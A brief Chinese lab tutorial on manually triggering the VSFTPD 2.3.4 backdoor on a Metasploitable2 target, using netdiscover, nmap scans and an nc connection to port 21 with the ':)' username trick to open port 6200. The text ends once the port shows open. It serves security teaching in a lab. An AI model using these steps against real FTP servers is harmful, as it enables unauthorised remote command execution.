VSFTPD v2.3.4 著名笑脸漏洞手工利用 Backdoor Command Execution:该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200
打开Kali和靶机metasploitable2,在Kali中输入
netdiscover -r ip
来查看同一网段的靶机的ip
可以知道靶机的IP为192.168.38.132
输入
nmap -sV ip
对目标服务器进行服务及版本扫描
可以知道该目标靶机版本与漏洞版本一致
扫描其6200端口是否开放:
nmap -p 6200 ip
可以知道6200端口是关闭的
另外开个窗口用nc连接靶机:
nc ip 21
然后就可以看见6200端口开了:
nmap -p 6200 ip